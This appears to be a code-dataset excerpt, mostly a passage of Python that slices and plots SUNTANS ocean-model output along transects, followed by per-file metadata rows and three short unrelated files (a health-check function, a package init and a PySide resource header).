Plots the slice location on a map
"""
self.contourf(z=-self.dv,clevs=30,titlestr='',cmap='gist_earth')
plt.plot(self.xslice[0,:],self.yslice[0,:],'m--')
def animate(self,**kwargs):
"""
Animates the slice
"""
# Initialise the plot object
h1,cb = self.pcolorslice(**kwargs)
fig = plt.gcf()
ax = fig.gca()
title=ax.set_title("")
def updateScalar(ii):
a=self.data[ii,:].squeeze()
am = np.ma.array (a, mask=np.isnan(a))
h1.set_array(am[am.mask==False])
title.set_text(self.__genTitle(tt=self.tstep[ii]))
return (title,h1)
self.anim = animation.FuncAnimation(fig, updateScalar, frames=len(self.tstep), interval=50, blit=True)
def loadData(self, variable, method='linear'):
"""
Interpolates the data in raw data onto the slice array
"""
tstep = self.tstep
self.Ntslice = len(tstep)
slicedata = np.zeros((self.Ntslice,self.Nkmax,self.Npt))
#if method=='linear':
# cellind3d = np.repeat(self.cellind.reshape((1,self.Npt)),self.Nkmax,axis=0)
# k3d = np.arange(0,self.Nkmax)
# k3d = np.repeat(k3d.reshape((self.Nkmax,1)),self.Npt,axis=1)
for tt in range(self.Ntslice):
if self.Ntslice>1:
print('Slicing data at time-step: %d of %d...'%(tt,self.Ntslice))
self.tstep=[tstep[tt]]
rawdata = Spatial.loadData(self, variable=variable)
for kk in range(self.Nkmax):
if method == 'nearest':
slicedata[tt,kk,:] = rawdata[kk,self.cellind]
elif method == 'linear':
slicedata[tt,kk,:] = self.interpLinear(rawdata[kk,:].squeeze(),self.xslice[0,:],self.yslice[0,:],self.cellind,k=kk)
else:
raise Exception(' unknown interpolation method: %s. Must be "nearest" or "linear"'%method)
mask = self.maskslice.reshape((1,self.Nkmax,self.Npt))
mask = mask==False
mask = mask.repeat(self.Ntslice,axis=0)
slicedata[mask] = np.nan
self.tstep=tstep
return slicedata.squeeze()
def get_klayer(self):
if self.klayer[0]==-99:
klayer=list(range(self.Nkmax))
Nkmax = self.Nkmax
else:
klayer=self.klayer
Nkmax=len(klayer)
return klayer,Nkmax
def _initInterp(self):
"""
Initialise the interpolant
Finds the horizontal indices of the slice points and
constructs the 3D mask array
"""
# Find the cell index of each point along the slice
self.Tri = GridSearch(self.xp,self.yp,self.cells)
self.cellind = self.Tri(self.xslice,self.yslice)
klayer,Nkmax = self.get_klayer()
# Construct the 3D coordinate arrays
self.xslice = np.repeat(self.xslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.yslice = np.repeat(self.yslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.distslice = np.repeat(self.distslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.zslice = np.repeat(-self.z_r[klayer].reshape((self.Nkmax,1)),self.Npt,axis=1)
# Construct the mask array
self.calc_mask()
# Get the bathymetry along the slice
self.hslice = -self.dv[self.cellind]
def calc_mask(self):
""" Construct the mask array"""
self.maskslice = np.zeros((self.Nkmax,self.Npt),dtype=np.bool)
for kk in range(self.Nkmax):
for ii in range(self.Npt):
if kk <= self.Nk[self.cellind[ii]]:
self.maskslice[kk,ii]=True
def _getSliceCoords(self,kind=3):
"""
Fits a spline through the input slice points
# Kind is the linear interpolation type
"""
n = self.xpt.shape[0]
t = np.linspace(0,1,n)
tnew = np.linspace(0,1,self.Npt)
if n <= 3:
kind='linear' # Spline won't work with <= 3 points
else:
kind=kind
Fx = interp1d(t,self.xpt,kind=kind)
Fy = interp1d(t,self.ypt,kind=kind)
self.xslice = Fx(tnew)
self.yslice = Fy(tnew)
self._getDistCoords()
def _getDistCoords(self):
# Calculate the distance along the slice
self.distslice = np.zeros_like(self.xslice)
self.distslice[1:] = np.sqrt( (self.xslice[1:]-self.xslice[:-1]) **2 + \
(self.yslice[1:]-self.yslice[:-1]) **2 )
self.distslice = self.distslice.cumsum()
def _getXYgraphically(self):
"""
Plot a map of the bathymetry and graphically select the slice points
"""
self.contourf(z=-self.dv,clevs=30,titlestr='Select points for slice on map\nRight-click to finish; middle-click to remove last point.',cmap='gist_earth')
x = plt.ginput(n=0,timeout=0,mouse_pop=2,mouse_stop=3)
# Find the location of the slice
xy = np.array(x)
self.xpt=xy[:,0]
self.ypt=xy[:,1]
self._getSliceCoords()
plt.plot(self.xslice,self.yslice,'m--')
plt.title('Close figure to continue...')
plt.show()
def _getXlabel(self,xaxis):
if xaxis == 'xslice':
xlab = 'Easting [m]'
elif xaxis == 'yslice':
xlab = 'Northing [m]'
elif xaxis == 'distslice':
xlab = 'Distance along transect [m]'
else:
raise Exception(' unknown "xaxis" value %d.\n Must be one of "xslice", "yslice" or "distslice".'%xaxis)
return xlab
def _overlayBathy(self,xdata,**kwargs):
"""
Pretty bathymetry overlay
"""
plt.fill_between(xdata,self.hslice,y2=self.hslice.min(),zorder=1e6,**kwargs)
def __genTitle(self,tt=None):
if tt is None:
if type(self.tstep)==int:
tt = self.tstep
else:
tt = self.tstep[0]
titlestr='%s [%s]\nTime: %s'%(self.long_name,self.units,\
datetime.strftime(self.time[tt],'%d-%b-%Y %H:%M:%S'))
return titlestr
class SliceEdge(Slice):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
edgemethod=1
abortedge=False
def __init__(self,ncfile,xpt=None,ypt=None,klayer=[-99],\
MAXITER=10000, Npt=100, **kwargs):
self.Npt=Npt
self.MAXITER=MAXITER
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpt,ypt):
"""
Updates the x and y coordinate info in the object
"""
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
self.j,self.nodelist =\
self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[self.nodelist]
self.yslice=self.yp[self.nodelist]
self.zslice = -self.z_r
self._getDistCoords()
self.edgexy()
# The x and y arrys need to be resized
self.xslice = 0.5*(self.xslice[1:]+self.xslice[0:-1])
self.yslice = 0.5*(self.yslice[1:]+self.yslice[0:-1])
self.distslice = 0.5*(self.distslice[1:]+self.distslice[0:-1])
# Get the mask
self.calc_mask()
# Calculate the area
self.area = self.calc_area()
# Calculate the normnal
self.ne1, self.ne2, self.enormal = self.calc_normal(self.nodelist,self.j)
# Get the bathymetry along the slice
de = self.get_edgevar(self.dv)
self.hslice = -de[self.j]
def loadData(self,variable=None,setunits=True,method='mean'):
"""
Load the specified suntans variable data as a vector
Overloaded method for edge slicing - it is quicker to load time step by
time step in a loop.
method: edge interpolation method - 'mean', 'max'
"""
nc = self.nc
if variable is None:
variable=self.variable
if setunits:
try:
self.long_name = nc.variables[variable].long_name
self.units= nc.variables[variable].units
except:
self.long_name = ''
self.units=''
j=self.j
# Check if cell-centered variable
is3D=True
isCell=False
if self.hasVar(variable):
if self.hasDim(variable,self.griddims['Ne']):
isCell=False
elif self.hasDim(variable,self.griddims['Nc']):
isCell=True
# Check if 3D
if self.hasDim(variable,self.griddims['Nk']) or\
self.hasDim(variable,'Nkw'): # 3D
is3D=True
else:
is3D=False
else:
isCell=True
if isCell:
nc1 = self.grad[j,0].copy()
nc2 = self.grad[j,1].copy()
# check for edges (use logical indexing)
ind1 = nc1==-1
nc1[ind1]=nc2[ind1]
ind2 = nc2==-1
nc2[ind2]=nc1[ind2]
klayer,Nkmax = self.get_klayer()
# This crashes if the variable doesn't exist like area
if self.hasDim(variable,'Nkw'): # vertical velocity
Nkmax +=1
def ncload(nc,variable,tt):
if variable=='agemean':
ac = nc.variables['agec'][tt,klayer,:]
aa = nc.variables['agealpha'][tt,klayer,:]
tmp = aa/ac
tmp[ac<1e-12]=0.
return tmp/86400.
if variable=='area':
eta = nc.variables['eta'][tt,:]
dzf = self.getdzf(eta)
dzf = Spatial.getdzf(self,eta)
return self.df*dzf
else:
if nc.variables[variable].ndim==1:
return nc.variables[variable][:]
elif self.hasDim(variable,self.griddims['Nk']): # 3D
return nc.variables[variable][tt,klayer,:]
else:
return nc.variables[variable][tt,:]
# For loop where the data is extracted
nt = len(self.tstep)
ne = len(self.j)
if is3D==True:
self.data = np.zeros((nt,Nkmax,ne))
else:
self.data = np.zeros((nt,ne))
for ii,tt in enumerate(self.tstep):
#tmp=nc.variables[variable][tt,:,:]
tmp = ncload(nc,variable,tt)
# Return the mean for cell-based variables
if isCell:
if method == 'mean':
self.data[ii,...] = 0.5*(tmp[...,nc1]+tmp[...,nc2])
elif method == 'max':
tmp2 = np.dstack((tmp[...,nc1], tmp[...,nc2]))
self.data[ii,...] =tmp2.max(axis=-1)
else:
self.data[ii,...]=tmp[...,self.j]
# Average 'w'
if self.hasDim(variable,'Nkw'):
self.data = self.data[:,1:]*0.5 + self.data[:,0:-1]*0.5
# Mask 3D data
if is3D:
maskval=0
self.data[ii,self.maskslice]=maskval
#fillval = 999999.0
#self.mask = self.data==fillval
#self.data[self.mask]=0.
self.data[self.data==self._FillValue]=0.
self.data = self.data.squeeze()
return self.data
def edgexy(self):
"""
Nx2 vectors outlining each cell in the edge slice
"""
def closePoly(xp,node,k):
return np.array([ [xp[node],\
xp[node+1],xp[node+1], xp[node],xp[node]],\
[-self.z_w[k],-self.z_w[k],-self.z_w[k+1],-self.z_w[k+1],-self.z_w[k]],\
]).T
self.xye = [closePoly(self.distslice,jj,kk) for kk in range(self.Nkmax) \
for jj in range(len(self.j)) ]
def calc_normal(self,nodelist,j):
"""
Calculate the edge normal
"""
# Calculate the unit normal along the edge
P1 = GPoint(self.xp[nodelist][0:-1],self.yp[nodelist][0:-1])
P2 = GPoint(self.xp[nodelist][1:],self.yp[nodelist][1:])
L = Line(P1,P2)
ne1,ne2 = L.unitnormal()
# Compute the unique normal of the dot product
enormal = np.round(self.n1[j]*ne1 +\
self.n2[j]*ne2)
return ne1,ne2,enormal
def mean(self,phi,axis='time'):
"""
Calculate the mean of the sliced data along an axis
axis: time, depth, area
time : returns the time mean. size= (Nk, Nj)
depth: returns the time and spatial mean. Size = (Nk)
area: returns the area mean. Size = (Nt)
"""
if axis=='time':
return np.mean(phi,axis=0)
elif axis=='area':
area_norm = self.area / self.area.sum()
return np.sum( np.sum(phi*area_norm,axis=-1),axis=-1)
elif axis=='depth':
dx = self.df[self.j]
dx_norm = dx / dx.sum()
return np.sum( self.mean(phi,axis='time')*dx_norm,axis=-1)
def plot(self,z,titlestr=None,**kwargs):
"""
Pcolor plot of the slice
"""
if self.clim is None:
self.clim=[]
self.clim.append(np.min(z))
self.clim.append(np.max(z))
# Set the xy limits
xlims=[self.distslice.min(),self.distslice.max()]
ylims=[-self.z_w.max(),-self.z_w.min()]
self.fig,self.ax,self.patches,self.cb=unsurf(self.xye,z.ravel(),xlim=xlims,ylim=ylims,\
clim=self.clim,**kwargs)
self.ax.set_aspect('auto')
def plotedges(self,color='m',**kwargs):
"""
plot for testing
"""
self.plotmesh()
#plt.plot(self.edgeline.xy,'r')
for ee in self.j:
plt.plot([self.xp[self.edges[ee,0]],self.xp[self.edges[ee,1]]],\
[self.yp[self.edges[ee,0]],self.yp[self.edges[ee,1]]],color=color,\
**kwargs)
def calc_area(self,eta=None):
"""
Calculate thee cross-sectional area of each face
"""
if eta is None:
eta = np.zeros((self.nslice,)) # Assumes the free-surface is zero
dzf = self.getdzf(eta)
area = dzf * self.df[self.j]
area[self.maskslice]=0
return area
def getdzf(self,eta):
""" Get the cell thickness along each edge of the slice"""
#dzf = Spatial.getdzf(self,eta,j=self.j)
dzf = np.repeat(self.dz[:,np.newaxis],len(self.j), axis=1)
dzf[self.maskslice]=0
return dzf
def get_width(self):
"""
Calculate the width of each edge as a 2d array
Missing cells are masked
"""
df = self.df[self.j]
width = np.ones((self.Nkmax,1)) * df[np.newaxis,:]
width[self.maskslice]=0
return width
def calc_mask(self):
""" Construct the mask array"""
klayer,Nkmax=self.get_klayer()
self.maskslice = np.zeros((Nkmax,len(self.j)),dtype=np.bool)
for k,kk in enumerate(klayer):
for ii,j in enumerate(self.j):
if kk >= self.Nke[j]:
self.maskslice[k,ii]=True
def get_edgeindices(self,xpt,ypt,method=1, abortedge=True):
"""
Return the indices of the edges (in order) along the line
method - method for line finding algorithm
0 - closest point to line
1 - closest point without doing a u-turn
abortedge - Set true to abort when slice hits a boundary
"""
# Load the line as a shapely object
#edgeline = asLineString([self.xslice,self.yslice])
Npt = xpt.shape[0]
xyline = [(xpt[ii],ypt[ii]) for ii in range(Npt)]
self.edgeline = LineString(xyline)
# Find the nearest grid Node to the start and end of the line
xy_1 = np.vstack((xpt[0],ypt[0])).T
node0 = self.grd.findnearest(xy_1)
xy_2 = np.vstack((xpt[-1],ypt[-1])).T
endnode = self.grd.findnearest(xy_2)
# This is the list containing all edge nodes
nodelist = [node0[0]]
def connecting_nodes(node,nodelist):
""" finds the nodes connecting to the node"""
edges = self.grd.pnt2edges(node)
cnodes = []
for ee in edges:
for nn in self.grd.edges[ee]:
if nn not in nodelist:
cnodes.append(nn)
return cnodes
def min_dist(nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((self.xp[nn],self.yp[nn])) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_line(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
#lines = [LineString([(self.xp[cnode],self.yp[cnode]),\
# (self.xp[nn],self.yp[nn])]) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_angle(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
dist = np.array(dist)
# Calculate the angle along the line of the new coordinate
def calc_ang(x1,x2,y1,y2):
return np.arctan2( (y2-y1),(x2-x1) )
angle1 = [calc_ang(self.xp[cnode],self.xp[nn],\
self.yp[cnode],self.yp[nn]) for nn in nodes]
# Calculate the heading of the line near the two points
def calc_heading(P1,P2,L):
d1 = L.project(P1)
d2 = L.project(P2)
if d1 <= d2:
P3 = L.interpolate(d1)
P4 = L.interpolate(d2)
else:
P3 = L.interpolate(d2)
P4 = L.interpolate(d1)
return calc_ang(P3.xy[0][0],P4.xy[0][0],P3.xy[1][0],P4.xy[1][0])
P1 = Point((self.xp[cnode],self.yp[cnode]))
angle2 = [calc_heading(P1,Point( (self.xp[nn],self.yp[nn]) ),line) \
for nn in nodes]
angdiff = np.array(angle2) - np.array(angle1)
# Use the minimum distance unless the point is a u-turn
rank = np.argsort(dist)
for nn in range(dist.shape[0]):
if np.abs(angdiff[rank[nn]]) <= np.pi/2:
return nodes[rank[nn]]
# if they all u-turn return the min dist
if rank.size==0:
return None
else:
return nodes[rank[0]]
# Loop through and find all of the closest points to the line
MAXITER=self.MAXITER
for ii in range(MAXITER):
cnodes = connecting_nodes(nodelist[-1],nodelist)
#if method==0:
# newnode = min_dist(cnodes,self.edgeline)
if method==0:
newnode = min_dist_line(nodelist[-1],cnodes,self.edgeline)
elif method==1:
newnode = min_dist_angle(nodelist[-1],cnodes,self.edgeline)
#print 'Found new node: %d...'%newnode
if newnode is None:
break
if ii>1 and abortedge:
if self.mark[self.grd.find_edge([newnode,nodelist[-1]])] not in [0,5]:
print('Warning: reached a boundary cell. Aborting edge finding routine')
break
nodelist.append(newnode)
if newnode == endnode:
#print 'Reached end node.'
break
# Return the list of edges connecting all of the nodes
return [self.grd.find_edge([nodelist[ii],nodelist[ii+1]]) for ii in\
range(len(nodelist)-1)], nodelist
class MultiSliceEdge(SliceEdge):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100,klayer=[-99],\
MAXITER=10000, **kwargs):
self.MAXITER=MAXITER
self.Npt=Npt
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpts,ypts):
"""
Updates the x and y coordinate info in the object
"""
self.slices=[]
for xpt,ypt in zip(xpts,ypts):
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
j,nodelist = self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.j = j # Need this to calculate other quantities
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[nodelist]
self.yslice=self.yp[nodelist]
self._getDistCoords()
# Get the mask
self.calc_mask()
# Get the area and the normal
area = self.calc_area()
ne1, ne2, enormal = self.calc_normal(nodelist,j)
dx = self.df[j]
# Store all of the info as a dictionary
self.slices.append({'j':j,'nodelist':nodelist,\
'xslice':self.xslice,'yslice':self.yslice, \
'distslice':self.distslice,'area':area,'normal':enormal,'dx':dx})
# Find the unique j values and sort them
j=[]
for ss in self.slices:
j = j + ss['j']
j = np.array(j)
self.j = np.sort(np.unique(j))
# Find the index of each slice into this j array
for ii,ss in enumerate(self.slices):
ind = np.searchsorted(self.j,np.array(ss['j']))
self.slices[ii].update({'subind':ind})
self.j = self.j.tolist()
def loadData(self,**kwargs):
"""
Overloaded method of MultiEdgeSlice
loads the data and then inserts it into each slice dictionary
returns a list of 3D arrays
"""
SliceEdge.loadData(self,**kwargs)
data=[]
for ii,ss in enumerate(self.slices):
data.append(self.data[...,ss['subind']])
return data
def mean(self,phi,axis='area'):
"""
Calculate the mean of the sliced data along an axis
axis: depth, area
depth: returns the time and spatial mean. Size = (Nslice,Nk)
area: returns the area mean. Size = (Nslice,Nt)
"""
Nslice = len(self.slices)
Nt = len(self.tstep)
Nk = self.Nkmax
if axis=='area':
data = np.zeros((Nslice,Nt))
for ii,ss in enumerate(self.slices):
area_norm = ss['area']/ ss['area'].sum()
data[ii,:] = np.sum( np.sum(phi[ii]*area_norm,axis=-1),axis=-1)
elif axis=='depth':
data = np.zeros((Nslice,Nk))
for ii,ss in enumerate(self.slices):
phimean = np.mean(phi[ii],axis=0) # time mean
dx = self.df[ss['j']]
ne = len(ss['j'])
dx = np.repeat(dx[np.newaxis,:],Nk,axis=0)
dx[phimean==0.]=0
dx_sum = dx.sum(axis=-1)
dx_sum = np.repeat(dx_sum[:,np.newaxis],ne,axis=-1)
dx_norm = dx / dx_sum
data[ii,:] = np.sum( phimean*dx_norm,axis=-1)
else:
raise Exception('axis = %s not supported'%axis)
return data
#####
## Testing data
#
####
## Inputs
#ncfile = 'C:/Projects/GOMGalveston/MODELLING/ForcingSensitivity/rundata/GalvCoarse_AprMay_2010_TWRH_007.nc'
#
#xpt = np.array([ 334640.1250722 , 331097.21398258, 327837.73578013,
# 324861.69046485, 323444.526029 , 321177.06293164,
# 319334.74916504, 318059.30117277, 319618.18205221,
# 322310.79448032, 326987.43711862, 329113.18377239,
# 332939.52774918])
#
#ypt = np.array([ 3247017.02417632, 3247867.32283783, 3247867.32283783,
# 3250559.93526594, 3254386.27924273, 3259488.07121179,
# 3263456.13163216, 3267140.75916537, 3272525.98402159,
# 3275785.46222404, 3281170.68708027, 3287264.49415442,
# 3292649.71901064])
#
#outfile = 'TestSlice.mov'
####
#sun = Slice(ncfile,xpt=xpt,ypt=ypt,Npt=500)
#
#temp = sun('salt',range(23),method='linear')
#
## Test ploting
##sun.pcolors(t=1,xaxis='distslice')
##plt.show()
#
## Test animation
##sun.animate(xaxis='yslice')
##sun.saveanim(outfile)
##plt.show()
#
## Test the xtplot
##sun.xtplot(zlayer='seabed',xaxis='yslice')
##plt.show()
#
#sun.plotslice()
#plt.show()
#
#tempnodes = sun.cell2nodeki(temp[0,:],sun.cellind,0*np.ones_like(sun.cellind))
#cell_scalar = sun.loadData(variable='temp')
## Get the values at the nodes
#for kk in range(30):
# print kk
# tempnode = sun.cell2nodek(cell_scalar[kk,:],k=kk)
# Gradient routine
#dH_dx,dH_dy = sun.gradH(sun.dv,0)
##
#sun.plot(dH_dx,titlestr='')
#plt.show()
# Test out an interpolation tool
#temp = sun('salt',1)
#dT_dx,dT_dy = sun.gradH(cell_scalar[0,:],cellind=sun.cellind,k=0)
########################################################
# Deprecated functions
########################################################
# def cell2nodek(self,cell_scalar,k=0):
# """
# ### NOT USED ###
#
# Map a cell-based scalar onto a node
#
# Uses sparse matrices to do the heavy lifting
# """
# if not self.__dict__.has_key('_datasparse'):
# self._datasparse=[]
# self._Asparse=[]
# self._indsparse=[]
# for kk in range(self.Nkmax):
# self._datasparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._Asparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._indsparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.int))
#
# for i in range(self.Nc):
# for j in range(3):
# if kk <= self.Nk[i]:
# self._Asparse[kk][self.cells[i,j],i] = self.Ac[i]
#
# self._Asparse[kk]=self._Asparse[kk].tocoo()
#
# for i in range(self.Nc):
# for j in range(3):
# if k <= self.Nk[i]:
# self._datasparse[k][self.cells[i,j],i] = cell_scalar[i]
# #self._Asparse[k][self.cells[i,j],i] = self.Ac[i]
# #self._indsparse[k][self.cells[i,j],i] = i
#
# node_scalar = self._datasparse[k].tocoo().multiply(self._Asparse[k]).sum(axis=1) / self._Asparse[k].sum(axis=1)
#
# return np.array(node_scalar).squeeze()
# def cell2nodekold(self,cell_scalar,k=0):
# """
# Map a cell-based scalar onto a node
#
# This is calculated via a mean of the cells connected to a node(point)
# """
#
# # Area weighted interpolation
# node_scalar = [np.sum(cell_scalar[self.pnt2cellsk(k,ii)]*self.Ac[self.pnt2cellsk(k,ii)])\
# / np.sum( self.Ac[self.pnt2cellsk(k,ii)]) for ii in range(self.Np)]
# return np.array(node_scalar)
#
# def cell2nodeki(self,cell_scalar,cellind,k):
# """
# NOT WORKING
#
# ## Needs an additional lookup index to go from local cell index to the main
# grid cell index
#
# Map a cell-based scalar onto a node
#
# This returns the nodes values of the nodes connected to cells, cellind at
# vertical level, k
#
# This is useful for finding the nodal values for a limited number of points, i.e.,
# during interpolation
# """
# ind = self.cells[cellind,:]
#
# node_scalar = np.zeros_like(ind)
#
# ni = cellind.shape[0]
#
# for ii in range(ni):
# for jj in range(3):
# node_scalar[ii,jj] = np.sum(cell_scalar[self.pnt2cellsk(k[ii],ind[ii,jj])]*self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])\
# / np.sum( self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])
#
#
# return node_scalar
#
# def pnt2cellsk(self, k, pnt_i):
# """
# Returns the cell indices for a point, pnt_i at level, k
#
# (Stolen from Rusty's TriGrid class)
# """
# if not self.__dict__.has_key('_pnt2cellsk'):
# # build hash table for point->cell lookup
# self._pnt2cellsk = []
# for k in range(self.Nkmax):
# self._pnt2cellsk.append({})
# for i in range(self.Nc):
# for j in range(3):
# if not self._pnt2cellsk[k].has_key(self.cells[i,j]):
# self._pnt2cellsk[k][self.cells[i,j]] = []
# if k <= self.Nk[i]:
# self._pnt2cellsk[k][self.cells[i,j]].append(i)
# return self._pnt2cellsk[k][pnt_i]
#
# def pnt2cellsparse(self,pnt_i):
#
# pdb.set_trace()
# #self._pnt2cellsk = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
# testsparse = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
#
# for i in range(self.Nc):
# for j in range(3):
# #self._pnt2cells[self.cells[i,j],i] = i
# testsparse[self.cells[i,j],i] = i
#
# pdb.set_trace()
| 33.54491 | 162 | 0.520579 | 9,780 | 78,428 | 4.129652 | 0.072699 | 0.012281 | 0.006537 | 0.004902 | 0.999455 | 0.999455 | 0.999455 | 0.999455 | 0.999455 | 0.999455 | 0 | 0.03187 | 0.347873 | 78,428 | 2,337 | 163 | 33.559264 | 0.757806 | 0.224104 | 0 | 0.995516 | 0 | 0.003587 | 0.032431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.019731 | null | null | 0.003587 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5ce4cb683708cd090c304ccd040bab8adf313bda | 104 | py | Python | services/check_ok/v0/check_ok.py | ojhermann/property_bids | 588df29122cec402e065a3ca3f346cad4becb105 | [
"MIT"
] | null | null | null | services/check_ok/v0/check_ok.py | ojhermann/property_bids | 588df29122cec402e065a3ca3f346cad4becb105 | [
"MIT"
] | 4 | 2021-07-07T12:43:12.000Z | 2021-07-15T13:56:10.000Z | services/check_ok/v0/check_ok.py | ojhermann/property_bids | 588df29122cec402e065a3ca3f346cad4becb105 | [
"MIT"
] | null | null | null | from models.check_ok.v0.model import CheckOk
def check_ok_response() -> CheckOk:
return CheckOk()
| 17.333333 | 44 | 0.75 | 15 | 104 | 5 | 0.733333 | 0.186667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.153846 | 104 | 5 | 45 | 20.8 | 0.840909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
5ce5c41d2ebbc24ffe39e747aebd086ed9fd99f1 | 151 | py | Python | mara/events/__init__.py | radiac/mara | 413f1f9f4c7117839a8c03d72733d6f75494ddd3 | [
"BSD-3-Clause"
] | 16 | 2015-11-22T13:12:46.000Z | 2020-09-04T06:42:55.000Z | mara/events/__init__.py | radiac/mara | 413f1f9f4c7117839a8c03d72733d6f75494ddd3 | [
"BSD-3-Clause"
] | 8 | 2016-01-09T23:32:46.000Z | 2019-09-30T23:30:49.000Z | mara/events/__init__.py | radiac/mara | 413f1f9f4c7117839a8c03d72733d6f75494ddd3 | [
"BSD-3-Clause"
] | 7 | 2016-07-19T04:39:31.000Z | 2020-09-04T06:43:06.000Z | from __future__ import annotations
from .app import * # noqa
from .base import * # noqa
from .client import * # noqa
from .server import * # noqa
| 21.571429 | 34 | 0.701987 | 20 | 151 | 5.1 | 0.45 | 0.392157 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218543 | 151 | 6 | 35 | 25.166667 | 0.864407 | 0.125828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a55121b045261f2aa48db0ec2c373cc79c3730d | 138,815 | py | Python | Controls/env/Lib/site-packages/PySide/examples/graphicsview/padnavigator/padnavigator_rc.py | LoicBoileau/Projet-S4---Robot-Delta | 0de0768e2609c18fbf060eb6726150a99080db1c | [
"MIT"
] | 32 | 2015-11-06T02:59:41.000Z | 2021-02-12T02:44:42.000Z | Controls/env/Lib/site-packages/PySide/examples/graphicsview/padnavigator/padnavigator_rc.py | LoicBoileau/Projet-S4---Robot-Delta | 0de0768e2609c18fbf060eb6726150a99080db1c | [
"MIT"
] | 56 | 2020-01-15T15:44:40.000Z | 2021-11-15T17:50:24.000Z | python/Lib/site-packages/PySide/examples/graphicsview/padnavigator/padnavigator_rc.py | jfveronelli/sqink | 5e9e6bc6c5c6c00abbc07099bc1fa1ab6cf79577 | [
"Unlicense"
] | 4 | 2016-02-01T09:15:05.000Z | 2020-04-30T03:41:04.000Z | # -*- coding: utf-8 -*-
# Resource object code
#
# Created: st 14. 10 21:40:04 2015
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
